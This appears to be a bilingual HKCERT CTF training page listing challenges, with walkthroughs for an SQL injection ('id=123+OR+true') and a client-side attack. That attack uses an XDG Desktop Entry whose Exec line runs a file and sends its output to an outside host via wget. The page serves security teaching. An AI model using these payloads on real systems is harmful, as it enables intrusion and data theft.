* Challenges are from previous competitions
* 均為在過往的比賽出現過的挑戰
* You can find all writeup (solutions) on Github.
* 你可以在 Github 找到所有的答案。
2024 /b6a.black
Only the admin can read the flag. Can you check the read the data in /flag.php
?
Attachment: leaked-secret_594f8d5f5dd0014276c395f4677e9649.zip
只有管理員才能看見旗幟!你能看到 /flag.php
中的內容嗎?
Attachment: leaked-secret_594f8d5f5dd0014276c395f4677e9649.zip
Can you guess the passcode?
Scratch Link: https://scratch.mit.edu/projects/738468454/
你能猜到密碼嗎?
What you need is to read the locked blog post. That's it.
http://training.hkcert24.pwnable.hk:20003
Attachment: elb-ii_0cdab7dd68e82bb14dd59bfdf071dcbd.zip
你只需要看到那篇被鎖上的部落格文章。
http://training.hkcert24.pwnable.hk:20003
Attachment: elb-ii_0cdab7dd68e82bb14dd59bfdf071dcbd.zip
If you can solve CrackMe in 2020, then you can solve it too, probably.
Attachment: crackme_00e6609f485d9ffafe3a0d21273979c3.zip
如果你能慢慢地解決它,你就能快快地解決它。
Attachment: crackme_00e6609f485d9ffafe3a0d21273979c3.zip
To fill, or not to fill, that is the question.
You can find the flag in the questionnaire.
填或不填,這是一個值得考慮的問題。
你可以在問卷中找到旗幟的。
Hack the admin panel
駭進這個管理員界面。
I wrote a simple shellcode interpreter! Try to read the flag in the file /flag
.
Attachment: shellcode-runner_f0f077bf6f6ee74930566384214e6f5c.zip
nc training.hkcert24.pwnable.hk 20007
我寫了一個解譯外殼代碼的程式!嘗試去讀一下/flag.txt
裡面的旗子吧.
附件: shellcode-runner_f0f077bf6f6ee74930566384214e6f5c.zip
nc training.hkcert24.pwnable.hk 20007
When I was searching for binary exploitation samples, I found this from hkcert ctf 2020. I made some small fixes to the game; see if you can still pwn this and steal $1000000 from me!
Attachment: absolute-gambler_a34e7244ab1107e7edbacf541c224504.zip
nc training.hkcert24.pwnable.hk 20008
當我在網上尋找的例題時,我從hkcert ctf 2020找到了這個。我改了一點東西;你能從我這裡盜取$1000000嗎?
附件: absolute-gambler_a34e7244ab1107e7edbacf541c224504.zip
nc training.hkcert24.pwnable.hk 20008
Do you know Caesar cipher? Vigenère cipher is one of its variant. I will feel safe if the key is longer than the plaintext.
Now I am going to repeatedly send you my encrypted password. You can't recover my password, can you?
Attachment: classic-one-time-pad_b0865470e76270c659fac80e77ef4e36.zip
nc training.hkcert24.pwnable.hk 28109
大家知道凱撒密碼嗎?維吉尼亞密碼是他的變種。如果密鑰長度比明文長的話,它會令我感覺很安全。
所以,我可以不斷地給你我已經加密過的密碼。你應該無法找到我的密碼吧!
Attachment: classic-one-time-pad_b0865470e76270c659fac80e77ef4e36.zip
nc training.hkcert24.pwnable.hk 28109
The post-it for the key encrypting the flag is missing. Now I can only regenerate the flag using this.... Wait, did I use that much time to generate the key?
看來寫有加密密鑰的便條紙不見了。現在我只能用這個來產生FLAG了…… 等一下,我當初用了那麼長時間來計算密鑰嗎?
You need a key to open the door... but what if the key is in the room?
http://training.hkcert24.pwnable.hk:28251
Attachment: catch-22_98e4dcdc123f3f69385f664e3e3c5baa.zip
Solution: https://hackmd.io/@blackb6a/hkcert-ctf-2022-ii-en-6a196795
早知不可獲勝
擠出喜感做諧星
無力當 你們崇尚的精英
有幸獻醜的 小丑 都不失敬
In the beginning of 2020, Khaled A. Nagaty invented a cryptosystem based on key exchange. The cipher is faster than ever... It is impossible to break, right?
Attachment: a-joke-cipher_58178adf8b732db76116f5bb7e0c4198.zip
To solve this challenge, you need to read the source code chall.py
. Try to get those questions answered:
shared_key
generated from y_A
and y_B
?m
from c
and shared_key
?m
into a flag that is in the format hkcert21{...}
?早知不可獲勝
擠出喜感做諧星
無力當 你們崇尚的精英
有幸獻醜的 小丑 都不失敬
在 2020 年初,Khaled A. Nagaty 基於密鑰交換發明了一套加密系統。該系統的加密速度其他系統快了許多... 它是牢不可破的吧?對吧?
Attachment: a-joke-cipher_58178adf8b732db76116f5bb7e0c4198.zip
要完成題目的話,你需要閲讀原代碼 chall.py
。嘗試解答以下問題:
shared_key
是即由 y_A
及 y_B
產生的嗎?c
及 shared_key
計算 m
?m
轉換為旗幟並符合格式 hkcert21{...}
?Flag 1: Read /flag1
Web: http://training.hkcert24.pwnable.hk:28039
Attachment: spyce_222c677640e7721636b146c58425aee3.zip
Solution: https://hackmd.io/@blackb6a/hkcert-ctf-2022-i-en-3f8a9ef6
I heard perfect shuffle is reproducible...
Attachment: shuffle_03f016d972f11c15bb25d038a2bd6bb3.zip
Hint:
.pyc
? Are there some tools for reverting pyc to some readable source (maybe back to python script)?我聽説完美的洗牌是可再現的...
Attachment: shuffle_03f016d972f11c15bb25d038a2bd6bb3.zip
提示:
.pyc
檔案是什麼?有沒有工具可以由 pyc 轉換至可閲讀的程式碼(可能是 python 程式碼)?Find out Squirrel Master's password!
Web: http://training.hkcert24.pwnable.hk:20015
This is a easy web challenge on SQL injection, which is a common vulnerability, especially in old applications. It is expected that experienced player / pentester can solve it within 5 min, but if you're new to this game, read on!
To find out abnormalities (bugs / vulnerabilities) in a web application, you need to first understand its behavior under normal usage. Visit the homepage (http://training.hkcert24.pwnable.hk:20015) and you will see a cute squirrels saying hi to you, with a big button to Join the community. Other links in the webpage are either out of scope (not in the same website), or not simply functioning. So lets click that button.
In the SquirrelChat application, we can see there are two function: Login
and Register
. After registering an account and login to the application, we can see that there are additional function Chatroom
and Logout
, with lengthy (but not helpful) text on the homepage.
Click into chatroom
, you can see a textbox allowing you to send message to the channel. Try send something!
[🤔1]: There are two more function in the application, can you find them out?
You should already know the content in this section if you're familiar with the web.
Similar to most of the website in the world, the site you're visiting contains two parts: client
and server
. The server
'serves' you by processing your request
and providing webpage, images, videos etc for your browser. The client
is your web browser, which send requests to server
and display the response on your screen.
[🤔2]: What is your browser software, and what is the server software?
💡: Google "What is my browser", "How to find out website server software"
When you send a message, your browser will send a request to the server chalf.hkcert21.pwnable.hk:28062
, with your chat message and other input values. The server will process your message and show it on every user's webpage as output.
[🤔3]: What are the input when you send a message in SquirrelChat?
Path and Query string are examples of the input
to websites. When you do a Google search, you can notice the web browser address bar will contain an URL (web address):
| https://www.google.com/search?q=What+is+query+string |
| ^ ^ ^ |
| Server Path Query string |
www.google.com
/search
q=What+is+query+string
[🤔4]: What does
+
means in query string?💡: Google it:
what does plus means in query string
[🤔5]: Can you change the above Google URL to search something else? Test with your web browser.
[🤔6]: Send an message in the SquirrelChat chat room, then click on your own name. Can you identify the
path
andquery string
from your browser's address bar?
As mentioned, the SquirrelChat application has a SQL injection vulnerability. The application uses SQL to store and retrieve your account details and channel messages in the server, and there are incorrect handling of user input when it construct the SQL query. Therefore it is possible to change the website behavior and leak flags from the server.
[🤔7]: In [🤔6], you have identified the query string of the URL. What does the numbers mean in the query string? Try changing it and see how the application behaves.
The SquirrelChat application construct the SQL query like this
SELECT * FROM users WHERE id=<Your Input>
In the above SQL query, <Your Input>
is replaced with the id
provided in the query string. In plain English, this SQL query will SELECT
(retrieve) users information, where the user id
equals to your input in the query string.
So if you visit
http://training.hkcert24.pwnable.hk:20015/chat/user?id=123
The query will become:
SELECT * FROM users WHERE id=123
Which show the user information whose id
equals to 123
. This code snippet looks completely innocent, but it is vulnerable to the deadly SQL injection vulnerability.
Let's lookup what is SQL injection vulnerability. Google what is sql injection ctf
and you can find this webpage as the top result.
[🤔8]: You got all the pieces to tackle this challenge. Can you exploit the SQL injection vulnerability without looking at the answer below?
If we are able to change the SQL query to following:
SELECT * FROM users WHERE id=123 OR true
By visiting profile of user 123, we know that the user does not exists (i.e. id=123
is False). By appending OR true
to the query, we changed the outcome to True regardless what is provided as id
, therefore the system will return EVERY user in the system, including our target: Squirrel Master's account. Recall your Math lessons:
OR Truth Table
+-----+-----+--------+
| A | B | A OR B |
+-----+-----+--------+
| T | T | T |
| T | F | T |
| F | T | T | <--- We are here
| F | F | F |
+-----+-----+--------+
[🤔9]: Can we construct the query string (input to the webpage) such that the application will run the above SQL query?
As you have answered in [🤔4], we have to change spaces into plus sign (+
) in the query string. Therefore, you can send the query string as id=123+OR+true
and get your flag.
+
sign has a semantic meaning in the query string. It is used to represent a space. https://stackoverflow.com/a/6855723找出 Squirrel Master 的密碼吧!
Web: http://training.hkcert24.pwnable.hk:20015
(以下翻譯由 DeepL 提供)
這是一個關於 SQL注入 的簡單 Web 挑戰,同時是一個常見的漏洞,特別是在舊的應用程序中。預計有經驗的玩家 / 滲透測試專家可以在5分鐘內解決這個問題。但如果你是這個遊戲的新手,請繼續閱讀!
要找出網絡應用程序中的異常(錯誤 / 漏洞),首先需要了解它在正常使用下的行為。訪問主頁 (http://training.hkcert24.pwnable.hk:20015) ,你會看到一隻可愛的松鼠在向你打招呼,還有一個大按鈕可以Join the community。網頁中的其他鏈接要麼不在範圍內(不在同一個網站內),要麼不會運作。所以讓我們點擊那個按鈕。
在 SquirrelChat 應用程序中,我們可以看到有兩個功能:Login
和 Register
。 在註冊賬戶並登錄到應用程序後,我們可以看到有額外的功能 Chatroom
和 Logout
,在主頁上有冗長(但沒有幫助)的文字。
點擊進入 chatroom
, 你可以看到一個文本框,允許你向頻道發送消息。試著發送一些東西!
[🤔1]: 應用程序中還有兩個功能,你能找到它們嗎?
如果你熟悉網頁,你應該已經知道本節的內容。
與世界上大多數網站類似,你正在訪問的網站包含兩個部分:客戶端
和 伺服器端
。伺服器端
通過處理你的 "請求 " 並為你的瀏覽器提供網頁、圖像、視頻等來為你服務。客戶端
是你的網絡瀏覽器,它向 伺服器端
發送請求並在你的屏幕上顯示響應。
[🤔2]: 你的瀏覽器軟件是什麼,服務器軟件又是什麼?
💡: Google一下: "我的瀏覽器是什麼","如何查出網站伺服器軟件"
當你發送消息時,你的瀏覽器將向服務器chalf.hkcert21.pwnable.hk:28062
發送請求,其中包括您的聊天信息和其他輸入。服務器將處理你的信息,並將其作為輸出顯示在每個用戶的網頁上。
[🤔3]: 當你向 SquirrelChat 發送消息時,輸入的是什麼?
路徑和查詢字符串是網站的 輸入
的例子。當你做 Google 搜索時,你可以注意到網絡瀏覽器的地址欄會包含一個URL(網址)。
| https://www.google.com/search?q=What+is+query+string |
| ^ ^ ^ |
| 伺服器 路徑 查詢字符串 |
www.google.com
。/search
q=What+is+query+string
[🤔4]:
+
在查詢字符串中是什麼意思?💡: Google一下:
加號在查詢字符串中是什麼意思
[🤔5]: 你能改變上述 Google 網址來搜索其他東西嗎?用你的網絡瀏覽器測試一下。
[🤔6]: 在 SquirrelChat 聊天室裡發送一條信息,然後點擊你自己的名字。你能從瀏覽器的地址欄中識別出
路徑
和查詢字符串
嗎?
如前所述,SquirrelChat 應用程序有一個 SQL 注入的漏洞。該應用程序使用 SQL 在伺服器中存儲和檢索你的賬戶信息和頻道信息。在構建SQL查詢時,存在對用戶輸入的不正確處理。因此,它有可能改變網站的行為,並從伺服器上洩露旗幟。
[🤔7]: 在 [🤔6]中,你已經確定了 URL 的查詢字符串。查詢字符串中的數字是什麼意思?試著改變它,看看應用程序如何表現。
SquirrelChat 應用程序構建的 SQL 查詢是這樣的
SELECT * FROM users WHERE id=<Your Input>
在上面的SQL查詢中,<Your Input>
被替換成查詢字符串中提供的id
。簡單地說,這個SQL查詢將 SELECT
(檢索)用戶信息,其中用戶 id
等於你在查詢字符串中的輸入。
因此,如果你訪問
http://training.hkcert24.pwnable.hk:20015/chat/user?id=123
查詢將變成:
SELECT * FROM users WHERE id=123
這將顯示用戶 id
等於 123
的用戶信息。這個代碼片段看起來完全無害,但它很容易受到致命的 SQL 注入漏洞的攻擊。
讓我們查一下什麼是SQL注入漏洞。Google 什麼是SQL注入ctf
,你可以找到這個 網頁 作為首要結果。
[🤔8]: 你得到了解決這個挑戰的所有材料。你能在不看下面的答案的情況下利用 SQL 注入的漏洞嗎?
如果我們能夠將SQL查詢改為以下內容。
SELECT * FROM users WHERE id=123 OR true
通過訪問 用戶123的資料 ,我們知道該用戶不存在(即 id=123
為假)。通過在查詢中添加OR true
,我們將結果改為True,不管提供的 id
是什麼,因此系統將返回系統中的每一個用戶,包括我們的目標。 Squirrel Master的賬戶。回顧你的數學課:
或門(OR) 真值表
+-----+-----+--------+
| A | B | A OR B |
+-----+-----+--------+
| T | T | T |
| T | F | T |
| F | T | T | <--- 我們在這裡
| F | F | F |
+-----+-----+--------+
[🤔9]: 我們能否構建查詢字符串(輸入到網頁),使應用程序能夠運行上述SQL查詢?
就像你在 [🤔4]中回答的那樣,我們必須把查詢字符串中的空格改為加號(+
)。因此,你可以發送查詢字符串為 id=123+OR+true
並獲得你的旗幟。
+
符號在查詢字符串中具有語義。它被用來代表一個空格。 https://stackoverflow.com/a/6855723Web: http://training.hkcert24.pwnable.hk:20016
Attachment: infantbrowser_6939c231042fd155a512940cd0982f76.zip
What if someone uses wget as the browser?
Flag: find the flag in the root directory with name /proof*.sh
The objective of this kind of challenges is to send a malicious webpage / URI to steal sensitive information or even execute arbitrary code in the victim's machine. Unlike XSS where the impact is limited to the victim's account in a particular website, a browser / desktop app exploit, or client-side attack in general, may compromise the entire victim's machine.
In this challenge, we are allowed to send the victim an arbitrary URI and they will open it with xdg-open
(just like clicking on links in a browser). To trick a victim to execute arbitrary code, we can craft an XDG Desktop Entry, which could specify what command to be executed.
But before we can trick the victim to open the Desktop Entry, we need to write the Desktop Entry to somewhere in the local filesystem. This could be done since the victim is using wget
as the browser, and the current working directory is writable.
For example, you can upload a Desktop Entry file named example.desktop
to your website (e.g. Github page), and then ask the victim bot to download it
[Desktop Entry]
Exec=sh -c "wget https://xxxxxxxxxxxxxxx.m.pipedream.net/?`/proof*.sh`"
Type=Application
If this Desktop Entry is opened, then it will execute the command after Exec=
, which will first execute /proof*.sh
and obtain the output, and execute wget https://xxxxxxxxxxxxxxx.m.pipedream.net/?(the output from executing /proof*.sh)
, which allows you to capture the flag
Once the example.desktop
file is written, you can ask the victim bot to open file:///tmp/example.desktop
so that they will execute the code you planted before
But make sure you use a unique filename for the Desktop Entry file since the challenge platform is common to every participants
Too easy for you? Now you can try babyURIi...
Web: http://training.hkcert24.pwnable.hk:20016
Attachment: infantbrowser_6939c231042fd155a512940cd0982f76.zip
(以下爲 DeepL 翻譯)
如果有人用 wget 作為瀏覽器怎麼辦?
旗幟:在根目錄中找到名稱為 /proof*.sh
的旗幟
這個挑戰的目的是發送一個惡意的網頁/URI來竊取敏感信息,甚至在受害者的機器上執行任意代碼。與XSS不同的是,XSS的影響僅限於受害者在特定網站上的賬戶,而瀏覽器/桌面應用程序的利用,或一般的客戶端攻擊,可能會損害整個受害者的機器。
在這個挑戰中,我們可以向受害者發送一個任意的URI,他們將用 xdg-open
打開它(就像在瀏覽器中點擊超連結一樣)。為了欺騙受害者執行任意代碼,我們可以製作一個XDG Desktop Entry,它可以指定要執行的命令。
但在我們欺騙受害者打開 Desktop Entry 之前,我們需要將桌面條目寫入本地文件系統的某個地方。正因受害者使用 wget
作為瀏覽器,而當前工作目錄是可寫的。
例如,你可以上傳一個名為example.desktop
的 Desktop Entry 文件到你的網站(例如Github頁面),然後要求受害者機器人下載它
[Desktop Entry]
Exec=sh -c "wget https://xxxxxxxxxxxxxxx.m.pipedream.net/?`/proof*.sh`"
Type=Application
如果這個 Desktop Entry 被打開,那麼它將執行 Exec=
之後的命令,亦即首先執行 /proof*.sh
獲得輸出,並執行 wget https://xxxxxxxxxxxxxxx.m.pipedream.net/?(執行 /proof*.sh 獲得的輸出)
,從而捕獲旗幟
一旦寫好了 example.desktop
文件,你可以要求受害者機器人打開 file:///tmp/example.desktop
,這樣他們就會執行你之前植入的代碼
但要確保你為不同 Desktop Entry 文件使用不同的文件名,因為挑戰平台對每個參與者都是通用的
對你來說太容易了?現在你可以試試 babyURIi...
You got the source code already, now what do you want? Dockerfile?
nc training.hkcert24.pwnable.hk 20017
你已經有原始碼了,你還想要什麼?
Dockerfile?
nc training.hkcert24.pwnable.hk 20017
Looks like the binary contains no flag.....
Can you help us to find the flag? There is only weird strings inside....
Attachment: scattered_605e04699fe3f83e375fc02c4ba09fe2.zip
看起來二進制檔案不包含旗幟.....
你能幫助我們找到這個旗幟嗎?裡面只有奇怪的字符串....
Attachment: scattered_605e04699fe3f83e375fc02c4ba09fe2.zip
Please reverse engineer and deactivate the time bomb set by Mr. Robot.
Submit the deactivation key as the flag.
Attachment: timebomb_20799fed87d97c7a9b7fcd00af5a21e8.zip
請對 Mr. Robot 設置的定時炸彈進行逆向工程並使其失效。
提交解除炸彈的鑰匙作為旗幟。
Attachment: timebomb_20799fed87d97c7a9b7fcd00af5a21e8.zip
Have you ever played Little Fighter 2? I have modified stage.dat to make the game more interesting. Of course, I hid a flag inside, too.
Attachment: lf2_3c15eea6088ec0491715966045ee71bd.zip
你玩過小朋友齊打交 2 嗎?為了讓遊戲更刺激,我修改了 stage.dat,也順道藏了一個 flag 在裡面。
Attachment: lf2_3c15eea6088ec0491715966045ee71bd.zip
Is your sanity enough? I afraid you are unable to face the upcoming challenges...
你的 SAN 值夠嗎?我怕你無法接受接下來的挑戰...
Seccomp is a Linux kernel feature to restrict the program from executing unexpected syscall. Can you break it?
nc training.hkcert24.pwnable.hk 20023
Attachment: jail-of-seccomp_0ce66def375a919a5de8cdc782627c63.zip
Seccomp 是一個Linux內核功能,限制程序執行意外的系統調用。你能破解它嗎?
nc training.hkcert24.pwnable.hk 20023
Attachment: jail-of-seccomp_0ce66def375a919a5de8cdc782627c63.zip
Give me the expression and I will return the answer.
nc training.hkcert24.pwnable.hk 20024
Attachment: python-calculator_15828ce780ab47a9a42e3c5ad5651aaa.zip
給我表達式,我就會回饋答案。
nc training.hkcert24.pwnable.hk 20024
Attachment: python-calculator_15828ce780ab47a9a42e3c5ad5651aaa.zip
You lose all the things, including the chance of getting out of the jail of python.
nc training.hkcert24.pwnable.hk 20025
Attachment: all-missing_f7be93352498ebd158a0a9fc069b30e9.zip
你已經失去了一切,包括逃出 Python 牢獄的機會。
nc training.hkcert24.pwnable.hk 20025
Attachment: all-missing_f7be93352498ebd158a0a9fc069b30e9.zip
Jack is testing his botnet, what could go wrong?
Attachment: jack-botnet-service-1_064a2bd6bb9036f6e8788d8418e18300.zip
傑克正在測試他的殭屍網絡,會出什麼問題呢?
Attachment: jack-botnet-service-1_064a2bd6bb9036f6e8788d8418e18300.zip
長話𥚃短說
但察覺太短
或者真正意義
並不需要說穿
Mystiz made a key vault which could encrypts his darkest secrets (i.e., the flag). Everything is protected with a bank-level encryption (i.e., a 256-bit key). You are welcome to look at the encrypted secrets and praise his cryptographic knowledge.
nc training.hkcert24.pwnable.hk 20029
Attachment: long-story-short_55e7b1b931d8aaa5670e38b1e14c82ea.zip
長話𥚃短說
但察覺太短
或者真正意義
並不需要說穿
Mystiz 做了一個鑰匙庫,可以加密他最黑暗的秘密(即旗幟)。一切都受到銀行級別的加密保護(即256位密鑰)。歡迎你看看這些加密的秘密,並讚揚他的密碼學知識。
nc training.hkcert24.pwnable.hk 20029
Attachment: long-story-short_55e7b1b931d8aaa5670e38b1e14c82ea.zip
Freedom where's our freedom?
Freedom what would it be
Can you tell me what's the reason?
Reason that meant to be
Every slightest mistake in cryptography would lead to a disastrous result. Let's see what will happen when you allow end-users to pick the mode of operation...
nc training.hkcert24.pwnable.hk 20030
Attachment: freedom_ff0173b179d746386dca0e93e6c00d47.zip
Freedom where's our freedom?
Freedom what would it be
Can you tell me what's the reason?
Reason that meant to be
密碼學中的每一個微小的錯誤都會導致災難性的結果。讓我們看看當你允許用戶挑選操作模式時會發生什麼...
nc training.hkcert24.pwnable.hk 20030
Attachment: freedom_ff0173b179d746386dca0e93e6c00d47.zip
I have accidentally format my SD card. Please help me to recover the photo inside 🙏.
Attachment: sdcard_f88edd62fb9d6f66b9bcab4497ca23b9.zip
Solution: https://hackmd.io/@blackb6a/hkcert-ctf-2022-i-en-3f8a9ef6
我唔小心 format 咗張卡。麻煩幫我搵翻啲相🙏。
Attachment: sdcard_f88edd62fb9d6f66b9bcab4497ca23b9.zip
題解:https://hackmd.io/@blackb6a/hkcert-ctf-2022-i-zh-3f8a9ef6